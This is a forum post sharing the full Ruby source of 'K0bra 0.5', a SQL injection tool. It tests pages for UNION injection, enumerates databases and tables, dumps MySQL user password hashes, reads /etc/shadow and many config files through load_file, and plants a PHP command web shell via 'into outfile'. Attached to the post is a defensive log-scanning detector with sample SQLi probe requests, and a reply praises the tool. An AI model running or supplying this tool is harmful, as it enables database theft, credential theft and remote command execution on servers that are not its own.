
[Ruby] K0bra 0.5


BigBear

  • Underc0der
« on: July 24, 2015, 01:12:31 pm »
Improved version of this Ruby script for scanning a page for the SQLi vulnerability.

The script has the following options:

  • Check vulnerability
  • Find the number of columns
  • Automatically find the number that displays data
  • Show tables
  • Show columns
  • Show databases
  • Show tables from another DB
  • Show columns of a table from another DB
  • Show users from mysql.user
  • Search for files using load_file
  • Show a file using load_file
  • Show values
  • Show information about the DB
  • Create a shell using outfile
  • Everything is saved in organized logs


The code:

Code: Ruby
#!/usr/bin/ruby
#K0bra 0.5
#(C) Doddy Hackman 2015

require "net/http"
require "open-uri"

$files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']

def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end

def decode_hex(text)
  text = text.sub("0x","")
  return [text].pack('H*')[0]
end

def encode_hex(text)
  return "0x"+text.unpack('H*')[0]
end

def copyright()
  print "\n-- == (C) Doddy Hackman 2015 == --\n"
  gets.chomp
  exit(1)
end

def installer()
  dir = Dir::pwd+"/"+"logs_webs"
  if not FileTest::directory?(dir)
    Dir::mkdir(dir)
  end
end

def savefile(file,text)
  url = URI.parse(file)
  save = File.open("logs_webs/"+url.host+".txt","a")
  save.puts text+"\n"
  save.close
end

def bypass(op)
  if op=="--"
    return "+","--"
  elsif op=="/*"
    return "/**/","/**/"
  elsif op=="%20"
    return "%20","%00"
  else
    return "+","--"
  end
end

def head()
  clean()
  print "

@      @@   @
@@     @  @ @@
@ @@  @  @  @ @   @ @ @@@
@ @   @  @  @@ @ @@@ @  @
@@    @  @  @  @  @   @@@
@ @   @  @  @  @  @  @  @
@@@ @   @@   @@@  @@@ @@@@@

"
end

def volverinicio()
  print "\n\n[+] Press any key to continue\n\n"
  gets.chomp
  inicio()
end

def clean()
  if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
    system("cls")
  else
    system("clear")
  end
end

def retorno(url,by)
  print "\n[+] Finished"
  print "\n\n[+] Press any key to continue\n\n"
  gets.chomp
  central(url,by)
end

def gettables(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  print "\n[+] Getting tables ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Tables Found : ",total,"\n\n"
    savefile(url,"\n[+] Tables Found : #{total}\n")
    for num in ("17"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Table Found : "+table+"\n"
        savefile(url,"[+] Table Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getcolumns(url,by,tablex)
  tablexa = encode_hex(tablex)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  print "\n[+] Getting columns ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Columns Found : ",total,"\n\n"
    savefile(url,"\n[+] Table : #{tablex}")
    savefile(url,"[+] Columns Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Column Found : "+table+"\n"
        savefile(url,"[+] Column Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getdbs(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  print "\n[+] Getting DBS ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] DBS Found : ",total,"\n\n"
    savefile(url,"\n[+] DBS Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] DB Found : "+table+"\n"
        savefile(url,"[+] DB Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def gettablesbydb(url,by,dbx)
  data  = encode_hex(dbx)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  print "\n[+] Getting tables ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Tables Found : ",total,"\n\n"
    savefile(url,"\n[+] DBS : #{dbx}")
    savefile(url,"[+] Tables Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Table Found : "+table+"\n"
        savefile(url,"[+] Table Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def getcolumnsbydb(url,by,db,tab)
  data = encode_hex(db)
  tabx = encode_hex(tab)

  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  print "\n[+] Getting columns ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Columns Found : ",total,"\n\n"
    savefile(url,"\n[+] DB : #{db}")
    savefile(url,"[+] Table : #{tab}")
    savefile(url,"[+] Columns Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Column Found : "+table+"\n"
        savefile(url,"[+] Column Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def mysqluser(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
  print "\n[+] Searching mysql.user\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Users Mysql Found : ",total,"\n\n"
    savefile(url,"[+] Users Mysql Found : "+total+"\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
        host,user,passw = $1,$2,$3
        print "[Host] : "+host
        print " [User] : "+user
        print " [Pass] : "+passw+"\n"
        savefile(url,"[Host] : "+host)
        savefile(url,"[User] : "+user)
        savefile(url,"[Pass] : "+passw+"\n")
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def details(url,by)
  pass1,pass2 = bypass(by)
  hextest = "0x2f6574632f706173737764" #/etc/passwd
  hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  web1 = url.sub(/hackman/,"0x4b30425241")
  web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
  print "\n[+] Extrating information of the DB\n"
  code1 = toma(web2)
  if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
    user,data,ver = $1,$2,$3
    print "\n[+] Username : "+user
    print "\n[+] Database : "+data
    print "\n[+] Version : "+ver+"\n\n"
    savefile(url,"\n[+] Username : "+user)
    savefile(url,"[+] Database : "+data)
    savefile(url,"[+] Version : "+ver+"\n")
  else
    print "[-] Not Found\n"
  end
  code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  code4 = toma(web3)
  if code2=~/K0BRA/
    print "[+] Mysql User : ON\n"
    savefile(url,"[+] Mysqluser : ON")
  end
  if code3=~/K0BRA/
    print "[+] information_schema : ON\n"
    savefile(url,"[+] information_schema : ON")
  end
  if code4=~/ERTOR854/
    print "[+] load_file : ON\n"
    savefile(url,"[+] load_file : ON")
  end
  savefile(url,"") # blank line
end

def dumper(url,by,table,col1,col2)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
  print "\n[+] Getting Values ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    savefile(url,"\n[+] Table : "+table)
    savefile(url,"[+] Column 1 : "+col1)
    savefile(url,"[+] Column 2 : "+col2)
    print "[+] Values Found : ",total,"\n"
    savefile(url,"\n[+] Values Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
        uno,dos = $1,$2
        print "\n[+] "+col1+" : "+uno+"\n"
        print "[+] "+col2+" : "+dos+"\n"
        savefile(url,"\n[+] "+col1+" : "+uno)
        savefile(url,"[+] "+col2+" : "+dos)
      end
    end
  else
    print "[-] Not Found\n"
  end
end

def fuzzfile(url,by)
  pass1,pass2 = bypass(by)
  print "\n[+] Fuzzing Files with load_file ....\n"
  $files.each do |file|
    res = file
    file = file.chomp
    file = encode_hex(file)
    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
    code = toma(web1)
    if code=~/ERTOR854(.*?)ERTOR854/m
      print "\n\n[File Found] : ",res
      print "\n\n[Source Start]\n"
      print $1
      print "\n[Source End]"
      savefile(url,"\n[File Found] : "+res)
      savefile(url,"\n[Source Start]\n")
      savefile(url,$1)
      savefile(url,"\n[Source End]")
    end
  end
  print "\n"
end

def abrirfile(url,by,file)
  pass1,pass2 = bypass(by)
  print "\n[+] Opening file ....\n"
  res = file
  file = encode_hex(file)
  web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
  code = toma(web1)
  if code=~/ERTOR854(.*?)ERTOR854/m
    print "\n\n[File Found] : ",res
    print "\n\n[Source Start]\n"
    print $1
    print "\n[Source End]\n"
    savefile(url,"\n[File Found] : "+res)
    savefile(url,"\n[Source Start]\n")
    savefile(url,$1)
    savefile(url,"\n[Source End]\n")
  else
    print "\n\n[-] Error\n\n"
  end
end

def into(url,by,full,dir)
  pass1,pass2 = bypass(by)
  linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  lugar = full+"/cmd.php"
  lugardos = dir+"/cmd.php"
  h = URI.parse(url)
  webtest = "http://"+h.host+lugardos
  web1 = url.sub(/hackman/,linea)
  formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  toma(formandoweb)
  code = toma(webtest)
  if code=~/Mini Shell By Doddy/
    print "\n[Shell Up] : "+webtest+"\n"
    savefile(url,"\n[Shell Up] : "+webtest+"\n")
  else
    print "\n\n[-] Error\n"
  end
end

def central(url,by)
  clean()
  head()
  print "\n\n[+] Page : #{url}\n"
  print "[+] ByPass : #{by}\n\n"

  print "\n[information_schema]\n\n"
  print "1 - Show tables\n"
  print "2 - Show columns of the a table\n"
  print "3 - Show databases\n"
  print "4 - Show tables from the a DB\n"
  print "5 - Show columns from the a table of the DB\n"
  print "\n[mysql.user]\n\n"
  print "6 - Show users\n"
  print "\n[Others]\n\n"
  print "7 - Show details\n"
  print "8 - Dump data\n"
  print "9 - Fuzz Files with load_file\n"
  print "10 - Load files with load_file\n"
  print "11 - Create Shell\n"
  print "12 - Show log\n"
  print "13 - Change target\n"
  print "14 - Exit\n\n\n"

  print "[+] Option : "
  op = gets.chomp
  print "\n"

  if op == "1"
    gettables(url,by)
    retorno(url,by)
  elsif op == "2"
    print "\n[+] Table : "
    table = gets.chomp
    getcolumns(url,by,table)
    retorno(url,by)
  elsif op == "3"
    getdbs(url,by)
    retorno(url,by)
  elsif op == "4"
    print "\n[+] DB : "
    db = gets.chomp
    gettablesbydb(url,by,db)
    retorno(url,by)
  elsif op == "5"
    print "\n[+] DB : "
    db = gets.chomp
    print "\n[+] Table : "
    tab = gets.chomp
    getcolumnsbydb(url,by,db,tab)
    retorno(url,by)
  elsif op == "6"
    mysqluser(url,by)
    retorno(url,by)
  elsif op == "7"
    details(url,by)
    retorno(url,by)
  elsif op == "8"
    print "\n[+] Table : "
    table = gets.chomp
    print "\n[+] Column 1 : "
    col1 = gets.chomp
    print "\n[+] Column 2 : "
    col2 = gets.chomp
    dumper(url,by,table,col1,col2)
    retorno(url,by)
  elsif op == "9"
    fuzzfile(url,by)
    retorno(url,by)
  elsif op == "10"
    print "\n[+] File : "
    file = gets.chomp
    abrirfile(url,by,file)
    retorno(url,by)
  elsif op == "11"
    print "\n[Full Source Discloure] : "
    full = gets.chomp
    print "\n[Directory to test] : "
    dir = gets.chomp
    into(url,by,full,dir)
    retorno(url,by)
  elsif op == "12"
    urla = URI.parse(url)
    ar = "logs_webs/"+urla.host+".txt"
    system("start #{ar}")
    retorno(url,by)
  elsif op == "13"
    inicio()
  elsif op == "14"
    copyright()
  else
    retorno(url,by)
  end
end

def findlength(url,by)
  pass1,pass2 = bypass(by)
  z = "1"
  print "\n[+] Finding columns lenght ...\n\n"
  x = "concat(0x4b30425241,1,0x4b30425241)"
  for num in ('2'..'25')
    z = z+","+num
    x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
    code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
    if code=~/K0BRA(.*?)K0BRA/
      print "[+] The Page has "+num+" columns\n"
      print "[+] The number "+$1+" print data"
      z = z.sub($1,"hackman")
      sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
      savefile(url,"[+] SQLI : "+sqli)
      savefile(url,"[+] Bypass : "+by+"\n")
      central(sqli,by)
    end
  end
  print "[-] Columns lenght not found\n"
  volverinicio()
end

def testvul(page,by)
  pass1,pass2 = bypass(by)
  print "\n\n[+] Testing vulnerability ...\n\n"
  codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  if codeuno != codedos
    print "[+] Vulnerable !\n"
    findlength(page,by)
  else
    print "[-] Not vulnerable\n"
    print "\n[+] Scan anyway y/n : "
    op = gets.chomp
    if op == "y"
      findlength(page,by)
    else
      volverinicio()
    end
  end
end

def inicio()
  clean()
  head()
  print "\n\n[+] Page : "
  page = gets.chomp
  print "\n[+] Bypass : "
  by = gets.chomp
  if page=~/hackman/
    central(page,by)
  else
    testvul(page,by)
  end
end

installer()
inicio()

# The End ?


That's all.
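
Added example, not part of the original post or of K0bra itself: a log-side detector for the request shapes the script above produces, written from the defender's side. It URL-decodes each request from Apache combined-format access logs, folds the script's spacer variants (`+`, `/**/`, `%20`, `%00`) into plain spaces, and reports which K0bra-specific traits are present (the 0x4b30425241 "K0BRA" marker, the unhex(hex(concat(...))) wrapper, the column-count probe, information_schema and mysql.user enumeration, the char(69,82,84,79,82,56,53,52) "ERTOR854" load_file marker, and the into outfile cmd.php write). The log lines, IPs and host are constructed for the example.

```ruby
require "uri"

# Marker for the load_file checks: char(69,82,84,79,82,56,53,52) = "ERTOR854".
# The value markers 0x4b30425241 / 0x4B3042524131 / 0x4B3042524132 spell
# "K0BRA", "K0BRA1", "K0BRA2" and appear in every extraction request.
ERTOR_MARKER = /char\(69,82,84,79,82,56,53,52\)/i

# Each trait is a name plus a pattern applied to the normalised request line.
TRAITS = {
  marker_concat:      /concat\(\s*0x4b30425241\s*,/i,
  unhex_hex_wrapper:  /unhex\(\s*hex\(\s*concat\(/i,
  column_probe:       /and 1=0 union select (?:concat\(0x4b30425241,\d+,0x4b30425241\),?)+/i,
  boolean_probe:      /\band 1=[01]\s*(?:--|$)/i,
  schema_enum:        /information_schema\.(?:tables|columns|schemata)/i,
  mysql_user_dump:    /from mysql\.user\b/i,
  load_file_marker:   /#{ERTOR_MARKER}.*load_file\(\s*0x[0-9a-f]+\s*\)/i,
  into_outfile_shell: /into outfile '[^']*cmd\.php'/i,
}.freeze

# Apache combined log format (the sample lines below follow it).
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<path>\S+) \S+" (?<status>\d{3}) \S+ "(?<ref>[^"]*)" "(?<ua>[^"]*)"\z/

# Undo the script's spacer variants so one set of patterns covers all of them:
# "+" and "%20" become spaces, "%00" (the "%20" bypass terminator) is dropped,
# and "/**/" (the "/*" bypass) becomes a space. Decoding twice also catches a
# double-encoded request; malformed %-sequences yield nil.
def normalize_request(path)
  decoded = URI.decode_www_form_component(path)
  decoded = URI.decode_www_form_component(decoded)
  decoded.gsub("/**/", " ").delete("\0").squeeze(" ")
rescue ArgumentError
  nil
end

# Returns the list of trait names found in one log line; empty if the line
# does not parse, cannot be decoded, or shows none of the traits.
def k0bra_traits(line)
  m = LOG_RE.match(line.strip)
  return [] unless m
  req = normalize_request(m[:path])
  return [] if req.nil?
  TRAITS.select { |_, re| req =~ re }.keys
end

# Group hits by client IP so a probing session is visible as a whole even
# when the first boolean probe alone would not be worth an alert.
def sessions(lines)
  lines.each_with_object(Hash.new { |h, k| h[k] = [] }) do |line, acc|
    traits = k0bra_traits(line)
    next if traits.empty?
    ip = LOG_RE.match(line.strip)[:ip]
    acc[ip].concat(traits).uniq!
  end
end

# Constructed sample traffic (documentation IP ranges, placeholder vhost):
# a boolean probe, a column-count probe, one information_schema request
# using the /**/ spacer, and one benign request from another client.
SAMPLE_LOG = [
  '203.0.113.9 - - [24/Jul/2015:13:12:31 -0300] "GET /news.php?id=1+and+1=0-- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [24/Jul/2015:13:12:32 -0300] "GET /news.php?id=1+and+1=0+union+select+concat(0x4b30425241,1,0x4b30425241),concat(0x4b30425241,2,0x4b30425241) HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
  '203.0.113.9 - - [24/Jul/2015:13:12:40 -0300] "GET /news.php?id=1/**/and/**/1=0/**/union/**/select/**/1,unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))/**/from/**/information_schema.tables/**/limit/**/0,1/**/ HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
  '198.51.100.4 - - [24/Jul/2015:13:13:01 -0300] "GET /news.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
].freeze

if __FILE__ == $0
  sessions(SAMPLE_LOG).each do |ip, traits|
    puts "#{ip}: #{traits.join(', ')}"
  end
end
```

The first line alone only shows a boolean probe, which is why the per-IP grouping matters: the same client then issues the column-count probe and the information_schema enumeration, and the combination is what identifies the tool.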

blackdrake

  • Co Admin
« Reply #1 on: July 26, 2015, 07:15:11 am »
What a great contribution, very good @…, I'll try it later :D

Regards.
